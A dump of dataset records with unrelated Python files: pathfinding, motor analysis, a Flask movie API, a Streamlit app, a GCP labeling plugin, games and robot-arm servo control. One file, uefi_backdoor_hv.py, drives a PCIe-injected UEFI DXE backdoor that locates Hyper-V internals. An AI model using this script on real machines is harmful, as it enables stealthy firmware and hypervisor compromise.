len(self.list_of_rows[0])\n self.height = len(self.list_of_rows)\n self.min = min([min(row) for row in self.list_of_rows])\n self.max = max([max(row) for row in self.list_of_rows])\n\n def rgb(self, point_x, point_y):\n rgb_value = int(((self.list_of_rows[point_y][point_x] - self.min) / (self.max - self.min)) * 255)\n return (rgb_value, rgb_value, rgb_value)\n\n def get_elevation(self, point):\n return self.list_of_rows[point[1]][point[0]]\n\n def get_rgb(self, point):\n return self.rgb(point[0], point[1])[0]\n\nclass Map:\n def __init__(self, data):\n self.data = data\n self.image = Image.new('RGB', (self.data.width, self.data.height))\n self.draw = ImageDraw.Draw(self.image)\n\n def draw_map(self):\n for y in range(self.data.height):\n for x in range(self.data.width):\n self.draw.point((x, y), self.data.rgb(x, y))\n return self\n\n def draw_path(self, path, color):\n for point in path[1]:\n self.draw.point(point, color)\n return self\n\n def display(self):\n return self.image.show()\n\nclass Pathfinder:\n def __init__(self, data):\n self.data = data\n self.recursive_results = {}\n self.iterative_results = []\n\n def greedy_path(self, starting_point):\n current_point = starting_point\n path_cost = 0\n path = []\n path.append(current_point)\n for step in range(self.data.width-1):\n up = (step+1, max(current_point[1]-1, 0))\n straight = (step+1, current_point[1])\n down = (step+1, min(current_point[1]+1, self.data.height-1))\n choices = [up, straight, down]\n\n up_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(up))\n straight_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(straight))\n down_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(down))\n costs = [up_cost, straight_cost, down_cost]\n\n choices_costs = dict(zip(choices, costs))\n sorted_choices = sorted(choices_costs, key=choices_costs.__getitem__)\n\n if up_cost >= straight_cost <= down_cost:\n path_cost += straight_cost\n path.append(straight)\n current_point = straight\n elif up_cost == down_cost:\n options = [up, down]\n decision = choice(options)\n path_cost += choices_costs[decision]\n path.append(decision)\n current_point = decision \n else:\n path_cost += choices_costs[sorted_choices[0]]\n path.append(sorted_choices[0])\n current_point = sorted_choices[0]\n\n return (path_cost, path)\n\n\n def recursive_best(self, starting_point):\n if starting_point in self.recursive_results:\n return self.recursive_results[starting_point]\n\n current_point = starting_point\n \n up = (current_point[0]+1, max(current_point[1]-1, 0))\n straight = (current_point[0]+1, current_point[1])\n down = (current_point[0]+1, min(current_point[1]+1, self.data.height-1))\n choices = [up, straight, down]\n\n up_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(up))\n straight_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(straight))\n down_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(down))\n costs = [up_cost, straight_cost, down_cost]\n\n choices_costs = dict(zip(choices, costs))\n sorted_choices = sorted(choices_costs, key=choices_costs.__getitem__)\n\n if current_point[0] == self.data.width - 2:\n self.recursive_results[current_point] = (choices_costs[sorted_choices[0]], [sorted_choices[0]])\n return self.recursive_results[current_point]\n\n paths = [self.recursive_best(point) for point in choices]\n new_paths = [(paths[0][0]+costs[0], [current_point]+paths[0][1]),\n (paths[1][0]+costs[1], [current_point]+paths[1][1]),\n (paths[2][0]+costs[2], [current_point]+paths[2][1])]\n sorted_paths = sorted(new_paths, key=lambda x: x[0])\n self.recursive_results[current_point] = sorted_paths[0]\n return self.recursive_results[current_point]\n\n\n def iterative_best(self, starting_point):\n new_data = [column for column in zip(*self.data.list_of_rows)]\n self.iterative_results = [(0, [(len(new_data)-1, y)]) for y, point in enumerate(new_data[-1])]\n\n for x, column in enumerate(new_data[-2::-1]):\n new_results = []\n for y, point in enumerate(column):\n current_point = ((len(new_data)-x)-2, y)\n up_path = [current_point] + self.iterative_results[max(y-1, 0)][1]\n straight_path = [current_point] + self.iterative_results[y][1]\n down_path = [current_point] + self.iterative_results[min(y+1, len(new_data[0])-1)][1]\n\n up_cost = abs(point-self.data.get_elevation(up_path[1]))\n straight_cost = abs(point-self.data.get_elevation(straight_path[1]))\n down_cost = abs(point-self.data.get_elevation(down_path[1]))\n\n up_choice = (up_cost + self.iterative_results[y][0], up_path)\n straight_choice = (straight_cost + self.iterative_results[y][0], straight_path)\n down_choice = (down_cost + self.iterative_results[y][0], down_path)\n\n choices = [up_choice, straight_choice, down_choice]\n sorted_choices = sorted(choices, key=lambda x: x[0])\n new_results.append(sorted_choices[0])\n self.iterative_results = new_results\n \n return self.iterative_results\n\ndata = Data('elevation_large.txt')\na_map = Map(data)\na_map.draw_map()\npaths = []\npathfinder = Pathfinder(data)\n\n\n#Greedy algorithm\nfor y in range(data.height - 1):\n path = pathfinder.greedy_path((0, y))\n a_map.draw_path(path, (0, 255, 0))\n paths.append(path)\nsorted_paths = sorted(paths, key=lambda x: x[0])\na_map.draw_path(sorted_paths[0], (0, 0, 255))\na_map.display()\nprint(sorted_paths[0][0])\n\n#Iterative algorithm\n# paths = pathfinder.iterative_best((0, 300))\n# for path in paths:\n# a_map.draw_path(path, (0, 255, 0))\n# sorted_paths = sorted(paths, key=lambda x: x[0])\n# a_map.draw_path(sorted_paths[0], (0, 0, 255))\n# a_map.display()\n# print(sorted_paths[0][0])\n\n#Recursive algorithm\n# for y in range(data.height - 1):\n# path = pathfinder.recursive_best((0, y))\n# a_map.draw_path(path, (0, 255, 0))\n# paths.append(path)\n# sorted_paths = sorted(paths, key=lambda x: x[0])\n# a_map.draw_path(sorted_paths[0], (0, 0, 255))\n# a_map.display()\n# print(sorted_paths[0][0])","sub_path":"pathfinder_with_classes.py","file_name":"pathfinder_with_classes.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25430485","text":"import serial\nimport matplotlib.pyplot as plt\nimport math\nimport scipy.optimize\nimport numpy as np\nfrom more_itertools import *\n\n\ndef frequency_motor(s, run_time, frequency, gain):\n s.write(b'time report on\\n')\n s.write(b'motor left report on\\n')\n\n start_time = None\n p = None\n\n times = []\n positions = []\n powers = []\n\n while True:\n line = s.readline()\n if b',' in line and b':' in line:\n time = None\n position = None\n\n words = line.split(b',')\n for word in words:\n parts = word.split(b':')\n if parts[0] == b'T':\n try:\n time = int(parts[1])\n except ValueError:\n print('Error parsing {} from {}'.format(parts[1], line))\n elif parts[0] == b'LM':\n try:\n position = int(parts[1])\n except ValueError:\n print('Error parsing {} from {}'.format(parts[1], line))\n\n if start_time is None:\n start_time = time\n else:\n time = time - start_time\n if time is not None and position is not None:\n times.append(time)\n positions.append(position)\n powers.append(p)\n\n if time % 10 == 0:\n p = gain / 2 + gain / 2 * math.sin(2 * math.pi * time * frequency)\n s.write(b'motor left set %d\\n' % p)\n\n if time >= run_time:\n s.write(b'motor left set 0\\n')\n s.write(b'motor left report off\\n')\n s.write(b'time report off\\n')\n break\n\n return times, positions, powers\n\n\ns = serial.Serial('/dev/ttyUSB0', 230400, timeout=1)\n\n\ndef calc_velocity(d):\n (last_time, last_position), (next_time, next_position) = d\n return (next_position - last_position) - (next_time - last_time)\n\n\ntimes, positions, powers = frequency_motor(s, 5000, 0.002, 10000)\n\ntimes, positions, powers = unzip(filter(lambda d: d[0] >= 1000, zip(times, positions, powers)))\n\ntimes = list(times)\npositions = list(positions)\npowers = list(powers)\n\nvelocities = list(map(calc_velocity, windowed(zip(times, positions), 2)))\n\nvelocities.append(last(velocities))\n\n\ndef sine(t, offset, gain, frequency, phase):\n return offset + gain * np.sin(2*math.pi*t*frequency + phase)\n\n\npopt, pcov = scipy.optimize.curve_fit(sine, times, velocities, p0=[3, 2.5, 0.002, 0])\n\nprint(popt)\nprint(pcov)\n\nfit_velocities = list(map(lambda t: sine(t, *popt), times))\n\nplt.plot(\n #times, velocities,\n times, list(map(lambda p: p / 1000 if p is not None else None, powers)),\n times, fit_velocities,\n linewidth=1\n)\nplt.show()\n","sub_path":"software/micromouse_analysis/analyze_frequency_motors.py","file_name":"analyze_frequency_motors.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"56677","text":"from flask import Flask, request, jsonify, make_response, abort\nfrom werkzeug.exceptions import HTTPException\n\nfrom db import db\n\napp = Flask(__name__)\n\n\n@app.errorhandler(HTTPException)\ndef err_handler(error):\n return make_response(jsonify({'status': error.code,\n 'reason': error.description}), error.code)\n\n\ndef validate_post(err_code):\n if not request.json:\n abort(err_code, \"Fields is required\")\n if 'movie' not in request.json:\n abort(err_code, \"Field 'movie' is required\")\n\n for i in ['title', 'year', 'director', 'length', 'rating']:\n if i not in request.json['movie']:\n abort(err_code, \"Field '\" + i + \"' is required\")\n\n\ndef gen_return(movie):\n return {\"movie\": {\n \"id\": movie.id,\n \"title\": movie.title,\n \"year\": movie.year,\n \"director\": movie.director,\n \"length\": movie.length,\n \"rating\": movie.rating\n }}\n\n\ndef get_movies():\n ret = {\"list\": []}\n for movies in db.session.query(db.Movies):\n ret[\"list\"].append(gen_return(movies)['movie'])\n return jsonify(ret)\n\n\ndef post_movies():\n validate_post(500)\n json_inp = request.json['movie']\n try:\n movie = db.Movies(json_inp['title'], json_inp['year'],\n json_inp['director'], json_inp['length'],\n json_inp['rating']) # TODO: А разве надо использовать id от клиенета\n except AssertionError as e:\n abort(400, e.args[0])\n else:\n db.session.add(movie)\n db.session.commit()\n return jsonify(gen_return(movie))\n\n\ndef get_one_movies(movies_id):\n movie = db.session.query(db.Movies).get(movies_id)\n if movie is None:\n abort(404, \"Movie not found\")\n return jsonify(gen_return(movie))\n\n\ndef patch_movie(movies_id):\n validate_post(400) # Код нужен потому, что в задание они указаны разные\n movie = db.session.query(db.Movies).get(movies_id)\n if movie is None:\n abort(404, \"Movie not found\")\n json_inp = request.json['movie']\n\n try:\n movie.title = json_inp['title']\n movie.year = json_inp['year']\n movie.director = json_inp['director']\n movie.length = json_inp['length']\n movie.rating = json_inp['rating']\n except AssertionError as e:\n abort(400, e.args[0])\n else:\n db.session.commit()\n return jsonify(gen_return(movie))\n\n\ndef delete_movie(movies_id):\n movie = db.session.query(db.Movies).get(movies_id)\n if movie is None:\n abort(404, \"Movie not found\")\n db.session.delete(movie)\n db.session.commit()\n return make_response(jsonify(\"Accepted\"), 202)\n\n\n@app.route('/api/movies', methods=[\"GET\", \"POST\"])\ndef api_movies():\n if request.method == \"GET\":\n return get_movies()\n elif request.method == \"POST\":\n return post_movies()\n\n\n@app.route('/api/movies/', methods=[\"GET\", \"PATCH\", \"DELETE\"])\ndef api_movies_ids(movies_id):\n if request.method == \"GET\":\n return get_one_movies(movies_id)\n elif request.method == \"PATCH\":\n return patch_movie(movies_id)\n elif request.method == \"DELETE\":\n return delete_movie(movies_id)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133054155","text":"#!/usr/bin/python3\n\"\"\"\nUse fabric to create tgz file of static code\n\"\"\"\nfrom fabric.api import local, task, env\nfrom datetime import datetime\n\n\n@task\ndef do_pack():\n \"\"\"\n Run tar command to compress files\n \"\"\"\n now = datetime.now()\n file_name = \"web_static_{}{}{}{}{}{}.tgz\".format(\n now.year,\n now.month,\n now.day,\n now.hour,\n now.minute,\n now.second\n )\n try:\n local(\"sudo tar -cvzf {} ./web_static\".format(file_name))\n local(\"sudo mkdir -p versions\")\n local(\"sudo mv ./{} versions/\".format(file_name))\n except:\n return (None)\n return (\"versions/{}\".format(file_name))\n","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1772173","text":"#!/usr/bin/env python\n\nimport sys, os\nfrom struct import pack, unpack\nfrom hexdump import hexdump\n\nfrom pcie_lib import *\nfrom uefi import *\n\nHV_INFO_ADDR = STATUS_ADDR - (8 * 5)\n\ndef main():\n\n payload = sys.argv[1] if len(sys.argv) > 1 else None\n\n dev = dxe_inject(payload = payload)\n \n if payload is None: return 0\n\n print('[+] DXE driver was planted, waiting for backdoor init...') \n\n while True:\n\n # wait for DXE backdoor\n status = dev.mem_read_8(STATUS_ADDR)\n \n if status == 0:\n\n # not ready yet\n time.sleep(1)\n continue\n\n print('[+] DXE driver was executed')\n\n break\n\n print('[+] Waiting for Hyper-V init...')\n\n dev.mem_write_8(HV_INFO_ADDR, 0)\n\n while True:\n\n # wait for hypervisor\n status, winload_cr3, hv_cr3, hv_entry, hv_base = unpack('qQQQQ', dev.mem_read(HV_INFO_ADDR, 8 * 5))\n\n if status == 0:\n\n # not ready yet\n time.sleep(1)\n continue\n\n if status == -1:\n\n print('ERROR: DXE driver is unable to locate winload.efi')\n break\n\n if status == -2:\n\n print('ERROR: DXE driver is unable to locate winload!HvlpBelow1MbPage')\n break\n\n if status == -3:\n\n print('ERROR: HvlpBelow1MbPage is not allocated, Hyper-V wasn\\'t started')\n break\n\n if status == -4:\n\n print('ERROR: DXE driver is unable to locate winload!HvlpTransferToHypervisor')\n break\n\n print('[+] Hyper-V image entry was executed\\n')\n print(' Winload CR3: 0x%.16x' % winload_cr3)\n print(' Hyper-V CR3: 0x%.16x' % hv_cr3)\n print(' Hyper-V VM exit handler: 0x%.16x' % hv_base)\n print(' Hyper-V image entry: 0x%.16x\\n' % hv_entry)\n\n break\n\n print('[+] DONE')\n \n dev.close()\n\n return 0\n\nif __name__ == '__main__':\n\n exit(main())\n","sub_path":"python/uefi_backdoor_hv.py","file_name":"uefi_backdoor_hv.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"504063154","text":"\"\"\"\nQ001\nTwo Sum\nEasy\n\n04/01/2021 revisit\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n save = {}\n for i in range(len(nums)):\n if target-nums[i] not in save:\n save[nums[i]] = i\n else:\n return [i, save[target-nums[i]]]\n\n\nnums = [2, 7, 11, 15]\ntarget = 13\n\nsol = Solution()\nprint(sol.twoSum(nums, target))\n\n\n\n","sub_path":"Q001-v2.py","file_name":"Q001-v2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197480708","text":"import streamlit as st\nimport os\nimport PIL\nimport streamlit.components.v1 as stc\n\n\ndef write():\n st.set_option('deprecation.showfileUploaderEncoding', False)\n st.title(\"Flurosis Tooth Detection By A.Adithya Sherwood IX-E\")\n st.subheader('Disclaimer: Please check with your local specialized dentist, if you are in doubt please try atleast twice.')\n conf_score = st.slider('Please Choose A Confidence Value',0.1,1.0,0.05)\n uploaded_file = st.file_uploader(\"Choose an image\", type=\"jpg\") \n\n \n if uploaded_file is not None:\n image = PIL.Image.open(uploaded_file)\n image = image.resize((416,416))\n image.save(f'./Test_Flurosis.jpg')\n image_flurosis = open(f'./Test_Flurosis.jpg','rb')\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n st.write(\"\")\n os.system(f\"python3 detect.py --weights './weights/best (2).pt' --img 416 --conf {str(conf_score)} --source ./Test_Flurosis.jpg --output ./test.jpg\")\n image_pred = PIL.Image.open(f'./test.jpg')\n st.image(image_pred, caption='Predictions.', use_column_width=True)\n","sub_path":"flurosis_tooth_detection.py","file_name":"flurosis_tooth_detection.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593161774","text":"import logging\nimport pkgutil\nimport re\nimport typing\nfrom abc import ABCMeta, abstractmethod\nfrom functools import lru_cache\n\nfrom googleapiclient import discovery\nfrom googleapiclient import errors\n\nfrom util.config_utils import is_copying_labels_from_project, iris_prefix\nfrom util.utils import cls_by_name, shorten, methods\n\nPLUGINS_MODULE = \"plugins\"\n\n\nclass Plugin(object, metaclass=ABCMeta):\n __project_access_client = discovery.build(\"cloudresourcemanager\", \"v1\")\n __proj_regex = re.compile(r\"[a-z]([-a-z0-9]*[a-z0-9])?\")\n subclasses = []\n\n def __init__(self):\n self.counter = 0\n self._google_client = discovery.build(*self.discovery_api())\n self._batch = self._google_client.new_batch_http_request(\n callback=self.__batch_callback\n )\n\n @classmethod\n @abstractmethod\n def discovery_api(cls) -> typing.Tuple[str, str]:\n pass\n\n @classmethod\n def is_labeled_on_creation(cls) -> bool:\n \"\"\"\n Only a few classes are labeled on creation, and these classes should override this method.\n \"\"\"\n return True\n\n @lru_cache(maxsize=256)\n def _project_labels(self, project_id) -> typing.Dict:\n\n assert self.__proj_regex.match(project_id), project_id\n\n request = self.__project_access_client.projects().get(projectId=project_id)\n try:\n response = request.execute()\n return response.get(\"labels\", {}) # Handle case where project has no labels\n except errors.HttpError as e:\n logging.exception(f\"Failing to get labels for project {project_id}: {e}\")\n return {}\n\n def __iris_labels(self, gcp_object) -> typing.Dict[str, str]:\n pfx = \"_gcp_\"\n\n def legalize_value(s):\n \"\"\"\n Only hyphens (-), underscores (_), lowercase characters,\n and numbers are allowed in label values. International characters are allowed.\n \"\"\"\n label_chars = re.compile(r\"[\\w\\d_-]\") # cached\n return \"\".join(c if label_chars.match(c) else \"_\" for c in s).lower()[:62]\n\n def value(func, gcp_obj):\n return legalize_value(func(gcp_obj))\n\n def key(func) -> str:\n return iris_prefix() + \"_\" + func.__name__[len(pfx) :]\n\n ret = {key(f): value(f, gcp_object) for f in methods(self, pfx)}\n\n return ret\n\n def __batch_callback(self, request_id, response, exception):\n\n if exception is not None:\n logging.error(\n \"in __batch_callback(), %s\",\n exception,\n )\n\n def do_batch(self):\n \"\"\"In do_label, we loop over all objects. But for efficienccy, we do not process\n then all at once, but rather gather objects and process them in batches of\n 1000 as we loop; then parse the remaining at the end of the loop\"\"\"\n try:\n self._batch.execute()\n except Exception as e:\n logging.exception(e)\n self.counter = 0\n\n @abstractmethod\n def do_label(self, project_id):\n \"\"\"Label all objects of a type in a given project\"\"\"\n pass\n\n @abstractmethod\n def get_gcp_object(self, log_data):\n \"\"\"Parse logging data to get a GCP object\"\"\"\n pass\n\n @abstractmethod\n def label_one(self, gcp_object: typing.Dict, project_id: str):\n \"\"\"Tag a single new object based on its description that comes from alog-line\"\"\"\n pass\n\n @abstractmethod\n def api_name(self):\n pass\n\n @abstractmethod\n def method_names(self):\n pass\n\n @classmethod\n def init(cls):\n def load_plugin_class(name):\n module_name = PLUGINS_MODULE + \".\" + name\n __import__(module_name)\n assert name == name.lower(), name\n plugin_cls = cls_by_name(PLUGINS_MODULE + \".\" + name + \".\" + name.title())\n return plugin_cls\n\n for _, module, _ in pkgutil.iter_modules([PLUGINS_MODULE]):\n plugin_class = load_plugin_class(module)\n Plugin.subclasses.append(plugin_class)\n\n assert Plugin.subclasses, \"No plugins defined\"\n\n @staticmethod\n def create_plugin(plugin_name: str) -> \"Plugin\":\n cls = cls_by_name(\n PLUGINS_MODULE + \".\" + plugin_name.lower() + \".\" + plugin_name\n )\n plugin = cls()\n return plugin\n\n def _build_labels(self, gcp_object, project_id):\n \"\"\"\n :return dict including original labels, project labels (if the system is configured to add those)\n and new labels. But if that would result in no change, return None\n \"\"\"\n\n original_labels = gcp_object[\"labels\"] if \"labels\" in gcp_object else {}\n project_labels = (\n self._project_labels(project_id) if is_copying_labels_from_project() else {}\n )\n iris_labels = self.__iris_labels(gcp_object)\n all_labels = {**iris_labels, **project_labels, **original_labels}\n if all_labels == original_labels:\n # Skip labeling because no change\n return None\n else:\n labels = {\"labels\": all_labels}\n fingerprint = gcp_object.get(\"labelFingerprint\", \"\")\n if fingerprint:\n labels[\"labelFingerprint\"] = fingerprint\n\n return labels\n\n def _name_after_slash(self, gcp_object):\n return self.__name(gcp_object, separator=\"/\")\n\n def _name_no_separator(self, gcp_object):\n return self.__name(gcp_object, separator=\"\")\n\n def __name(self, gcp_object, separator=\"\"):\n try:\n name = gcp_object[\"name\"]\n if separator:\n index = name.rfind(separator)\n name = name[index + 1 :]\n return name\n except KeyError as e:\n logging.exception(e)\n return None\n","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"130704425","text":"import gui\nroot = gui.Tk()\n#import date2\n#root = date2.Tk()\nroot.title('MUKYALA MUKASA KAWEMPE DOMICILIARY CLINIC')\nroot['bg']='black'\nfrmmenu=gui.FormMenu(root)\n#frmmenu._init_menu()\nfrmmenu._init_widgets()\n\n#root.geometry(\"1040x650+0+0\")\nroot.geometry(\"1040x650+200+100\")\nroot.resizable(False,False)\n\nroot.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"502030722","text":"import numpy\nimport mainwindow\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import *\n\n\nclass MainWindow(QMainWindow, mainwindow.Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.size = 0\n self.setupBtn.clicked.connect(self.reset_view)\n\n self.lambda_matrix = []\n self.calcBtn.clicked.connect(self.calculate)\n\n def enable_cell(self, i, j):\n item = QTableWidgetItem(\"-\")\n item.setFlags(Qt.ItemIsEnabled)\n brush = QBrush(QColor(168, 168, 168))\n brush.setStyle(Qt.SolidPattern)\n item.setBackground(brush)\n\n self.intensTable.setItem(i, j, item)\n\n def reset_view(self):\n self.intensTable.clear()\n self.intensTable.setRowCount(self.spinBox.value())\n self.intensTable.setColumnCount(self.spinBox.value())\n self.probTable.setRowCount(self.spinBox.value())\n self.size = self.spinBox.value()\n\n self.enable_cell(0, 0)\n self.enable_cell(0, self.size - 1)\n self.enable_cell(self.size - 1, 0)\n self.enable_cell(self.size - 1, self.size - 1)\n\n for i in range (1, self.size - 1):\n for j in range (1, self.size - 1):\n self.enable_cell(i, j)\n\n def calculate(self):\n matrix = []\n for i in range(self.size):\n row = []\n for j in range(self.size):\n val = self.intensTable.item(i, j).text()\n if val == \"-\":\n row.append(0)\n else:\n row.append(float(val))\n matrix.append(row)\n\n left = []\n for i in range(self.size):\n p = []\n sum = 0\n for j in range(self.size):\n p.append(matrix[j][i])\n sum += matrix[i][j]\n p[i] = -sum\n left.append(p)\n norm = [1.0 for i in range(self.size)]\n left[self.size - 1] = norm\n right = [0 for i in range(self.size)]\n right[self.size - 1] = 1\n numpy_matrix = numpy.array(left)\n numpy_vector = numpy.array(right)\n\n array = numpy.linalg.solve(numpy_matrix, numpy_vector)\n\n for i in range(self.size):\n item = QTableWidgetItem(str(round(array[i]*100, 3))+\"%\")\n self.probTable.setItem(i, 0, item)\n\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n mw = MainWindow()\n mw.show()\n sys.exit(app.exec_())\n","sub_path":"Kolmogorov equations/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634231800","text":"# https://app.codesignal.com/arcade/intro/level-2/xskq4ZxLyqQMCLshr/solutions\n\ndef matrix_elements_sum(matrix):\n\n result = 0\n banned_idx = []\n\n for row in matrix:\n for el_idx in range(len(row)):\n if row[el_idx] <= 0:\n banned_idx.append(el_idx)\n if el_idx in banned_idx:\n continue\n else:\n result += row[el_idx]\n\n return result\n","sub_path":"intro/08_matrix_elements_sum.py","file_name":"08_matrix_elements_sum.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541010286","text":"import pygame as pg\nfrom LabyrinthUtility import *\nfrom LabyrinthGenerator import *\nimport random as rand\n\npg.init()\nendGame = False\nclock = pg.time.Clock()\n(xsize, ysize) = (100,50)\nlabyrinth = Labyrinth(xsize,ysize)\nscale = 15 #pixels per cell in labyrinth\nscreen = pg.display.set_mode((xsize*scale,ysize*scale))\nwallwidth = 3\n\ndepthFirstNoRec(labyrinth,rand.randint(0,xsize-1),rand.randint(0,ysize-1))\n\nplayer = Player(labyrinth,0,0)\nlabyrinth.characters.append(player)\n\ndef drawLabyrinth(labyrinth):\n\tscreen.fill((255,255,255))\n\tfor x in range(labyrinth.xsize):\n\t\tfor y in range(labyrinth.ysize):\n\t\t\tif labyrinth.array[x,y].pathLeft == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),(x*scale,y*scale),(x*scale,(y+1)*scale-1),wallwidth)\n\t\t\tif labyrinth.array[x,y].pathRight == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),((x+1)*scale-1,y*scale),((x+1)*scale-1,(y+1)*scale-1),wallwidth)\n\t\t\tif labyrinth.array[x,y].pathUp == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),(x*scale,y*scale),((x+1)*scale-1,y*scale),wallwidth)\n\t\t\tif labyrinth.array[x,y].pathDown == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),(x*scale,(y+1)*scale-1),((x+1)*scale-1,(y+1)*scale-1),wallwidth)\n\tfor c in labyrinth.characters:\n\t\tpg.draw.circle(screen,(255,0,0),(int(c.x*scale+scale/2),int(c.y*scale+scale/2)),int(scale/2-wallwidth))\n\nmoveCountDown = 0\nwhile not endGame:\n\tfor event in pg.event.get():\n\t\tif event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):\n\t\t\tendGame = True\n\tpressed = pg.key.get_pressed()\n\tif (pressed[pg.K_UP] or pressed[pg.K_DOWN] or pressed[pg.K_LEFT] or pressed[pg.K_RIGHT]) and moveCountDown == 0:\n\t\tmoveCountDown = 7\n\t\tif pressed[pg.K_UP]: player.moveUp()\n\t\tif pressed[pg.K_DOWN]: player.moveDown()\n\t\tif pressed[pg.K_LEFT]: player.moveLeft()\n\t\tif pressed[pg.K_RIGHT]: player.moveRight()\n\tif moveCountDown > 0:\n\t\tmoveCountDown -= 1\n\tdrawLabyrinth(labyrinth)\n\tpg.display.flip()\n\tclock.tick(60)\n","sub_path":"LabyrinthGame.py","file_name":"LabyrinthGame.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"193315894","text":"#---Control servos in robotic arm with xbox controller---#\nimport pygame, RPi.GPIO as gpio, time\n\n#control update frequency\nCLOCK = pygame.time.Clock()\nclock_speed = 20\n\n#vars for if program running\n#and if joystick connected\njoystick_connect = True\nrunning = True\n\n#used to end program\ndef stop():\n for i in range(0, len(servos)):\n servos[i].stop()\n pygame.quit()\n print('clean exit')\n\n#convert a value to degrees, 0-180\ndef convert(x):\n return ((1.0/18.0)*x+3)\n\ndef reset():\n for i in range(0, len(pins)):\n servos[i].ChangeDutyCycle(convert(start_pos[i]))\n \n#initailize the pygame library\npygame.init()\n\n#use first joystick connected since only\n#one xbox remote is used\njoystick = pygame.joystick.Joystick(0)\n#initailize joystick\njoystick.init()\n\n#initailize GPIO\ngpio.setmode(gpio.BCM)\ngpio.setwarnings(False)\n\n#array to hold pin numbers\npins = [21,16,12,23,25,18]\n#array of servos\nservos = []\n\n#increment variable\nstart_pos = [-15, 120, 15, 120, 35, 150]\nservo_pos = [-15, 120, 15, 120, 35, 150]\n\n#loop through all pins\n#setup pins for output mode\n#add pin to servo array\n#start servo\nfor i in range(0, len(pins)):\n gpio.setup(pins[i], gpio.OUT)\n servos.append(gpio.PWM(pins[i],50))\n\nservos[0].start(convert(servo_pos[0]))\nservos[1].start(convert(servo_pos[1]))\nservos[2].start(convert(servo_pos[2]))\nservos[3].start(convert(servo_pos[3]))\nservos[4].start(convert(servo_pos[4]))\nservos[5].start(convert(servo_pos[5]))\n \n#limits for servos\nUPPER = 180\nLOWER = 3\n\n#BOOOLS for movement\nbase_mv = False\nbase_mv_opp = False\nshoulder_mv = False\nshoulder_mv_opp = False\nelbow_mv = False\nelbow_mv_opp = False\nswivel_mv = False\nswivel_mv_opp = False\nwrist_mv = False\nwrist_mv_opp = False\ngripper_mv = False\ngripper_mv_opp = False\n\n#increment amounts\nb_mv = 3\ns_mv = 5\ne_mv = 5\nsw_mv = 5\nw_mv = 5\ng_mv = 5\n'''\nservo:\n 0 - base\n 1 - shoulders\n 2 - elbow\n 3 - swivel\n 4 - wrist\n 5 - gripper\n'''\n#run until user decides to quit\nwhile(running):\n # User did something, this applies to keyboard or\n #joystick\n for event in pygame.event.get(): \n \n # Check if anything on joystick changed \n if event.type == pygame.JOYBUTTONDOWN or event.type == pygame.JOYAXISMOTION:\n\n #Control swivel base\n #Top left axis, left direction\n #does not allow user to go past limits\n if joystick.get_axis(0) > .9:\n base_mv = True\n elif joystick.get_axis(0) < -.9:\n base_mv_opp = True\n else:\n base_mv = False\n base_mv_opp = False\n\n #Shoulders - left stick, up/down\n if joystick.get_axis(1) < -.9:\n shoulder_mv = True\n elif joystick.get_axis(1) > .9:\n shoulder_mv_opp = True\n else:\n shoulder_mv = False\n shoulder_mv_opp = False\n\n #elbow - right stick, up/down\n if joystick.get_axis(4) < -.5:\n elbow_mv = True\n elif joystick.get_axis(4) > .5:\n elbow_mv_opp = True\n else:\n elbow_mv = False\n elbow_mv_opp = False\n\n #wrist joint - A and Y, A down Y up\n if joystick.get_button(0):\n swivel_mv = True\n elif joystick.get_button(3):\n swivel_mv_opp = True\n else:\n swivel_mv = False\n swivel_mv_opp = False\n \n\n #wrist swivel - RB and LB, RB left (CCW) LB right (CW)\n if joystick.get_button(5):\n wrist_mv = True\n elif joystick.get_button(4):\n wrist_mv_opp 